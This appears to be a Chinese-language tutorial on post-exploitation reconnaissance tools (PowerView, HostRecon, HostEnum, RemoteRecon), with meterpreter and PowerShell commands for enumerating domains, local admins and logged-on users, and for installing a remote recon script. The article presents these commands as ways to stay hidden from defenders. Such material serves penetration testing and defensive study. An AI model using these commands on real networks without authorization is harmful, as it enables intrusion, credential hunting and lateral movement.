PowerView腳本怎么用

本篇文章為大家展示了PowerView腳本怎么用，內(nèi)容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細介紹希望你能有所收獲。

傳統(tǒng)的內(nèi)部偵察測試使用Windows內(nèi)置命令，如net view、net user等，以獲取主機和域信息。因為藍色團隊可以監(jiān)視這些命令并觸發(fā)警報。所以使用其他方法，如PowerShell和WMI，避免在環(huán)境探索的過程中被檢測。

PowerView
PowerView是由Will Schroeder開發(fā)的PowerShell腳本，是PowerSploit框架和Empire的一部分。該腳本僅依賴于PowerShell和WMI (Windows管理工具)進行查詢。從現(xiàn)有的meterpreter會話PowerView中可以加載和執(zhí)行以下命令來檢索關(guān)于域的信息：
meterpreter > load powershell
meterpreter > powershell_import /root/Desktop/PowerView.ps1
meterpreter > powershell_execute Get-NetDomain
PowerView有各種各樣的cmdlet，可以發(fā)現(xiàn)本地管理員。
meterpreter > powershell_execute Invoke-EnumerateLocalAdmin
Invoke-UserHunter可以幫助擴展網(wǎng)絡(luò)訪問，因為它可以識別用戶登錄的系統(tǒng)，并且可以驗證當(dāng)前用戶是否有本地管理員訪問這些主機。
PS > Invoke-UserHunter
PowerView包含多個cmdlet，還可以檢索域信息。
PS > Get-NetForest
還有一些模塊可以執(zhí)行基于主機的枚舉。
(Empire: xx) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) ＞ info
另外還有一個PowerView的Python實現(xiàn)，如果提供了憑證，它可以在不屬于域內(nèi)的主機上執(zhí)行。
#./pywerver.py get-netshare -w PENTESTLAB -u test -p Password123 --computername WIN-PTELU2U07KG
https://github.com/PowerShellMafia/PowerSploit

HostRecon
還有一個PowerShell腳本可以自動執(zhí)行主機中的環(huán)境探索任務(wù)。Beau Bullock開發(fā)了HostRecon并可以使用PowerShell和WMI查詢從主機檢索各種信息以逃避檢測。HostRecon可以枚舉本地用戶和主機的本地管理員。該腳本將執(zhí)行一系列檢查，以確定防火墻狀態(tài)、安裝的防病毒解決方案(如果使用了LAPS)和應(yīng)用程序白化產(chǎn)品。因為保持隱形是紅隊評估的首要任務(wù)，獲得這方面的知識對于在這一階段和以后使用的閃避行動是必不可少的。該腳本還會嘗試識別域名密碼策略，域控制器和域管理員等域名信息。
meterpreter > powershell_import /root/Desktop/HostRecon.ps1
meterpreter > powershell_execute Invoke-HostRecon
https://github.com/dafthack/HostRecon

HostEnum
HostEnum腳本由Andrew Chiles開發(fā)在主機上執(zhí)行時提供詳細信息，和HostRecon類似。 HostEnum既可以在本地執(zhí)行，也可以從內(nèi)存中執(zhí)行，并可以以HTML格式生成輸出。
meterpreter > load powershell
meterpreter > powershell_import /root/Desktop/HostEnum.ps1
meterpreter > powershell_shell
PS > Invoke-HostEnum -Local -Domain   參數(shù)-Domain將執(zhí)行某些域檢查，如檢索域用戶列表和其他域信息。
https://github.com/threatexpress/red-team-scripts

RemoteRecon
在獲得本地管理員憑證并將這些憑證共享到多個主機的場景中，可以使用WMI在遠程主機上執(zhí)行環(huán)境探索。RemoteRecon是由Chris Ross開發(fā)的，它的目的是允許紅色團隊在不部署原始植入物的情況下進行偵察。該腳本可以捕獲擊鍵和屏幕截圖、執(zhí)行命令和shell代碼，還可以加載PowerShell腳本以執(zhí)行其他任務(wù)。在進行任何操作之前，需要首先使用本地管理員憑證將腳本遠程安裝到主機中，或者如果當(dāng)前用戶已經(jīng)是目標主機上的本地管理員，則只需要計算機名。
PS C:\> Import-Module .\RemoteRecon.ps1
PS C:\> Install-RemoteRecon -ComputerName 'WIN-2NE38K15TGH'
通過腳本執(zhí)行的命令的輸出可以用-Results參數(shù)來檢索。
PS C:\> Invoke-PowerShellCmd -ComputerName 'WIN-2NE38K15TGH' -Cmd "ps -name exp" -Verbose
PS C:\> Invoke-PowerShellCmd -ComputerName 'WIN-2NE38K15TGH' -Results

上述內(nèi)容就是PowerView腳本怎么用，你們學(xué)到知識或技能了嗎？如果還想學(xué)到更多技能或者豐富自己的知識儲備，歡迎關(guān)注億速云行業(yè)資訊頻道。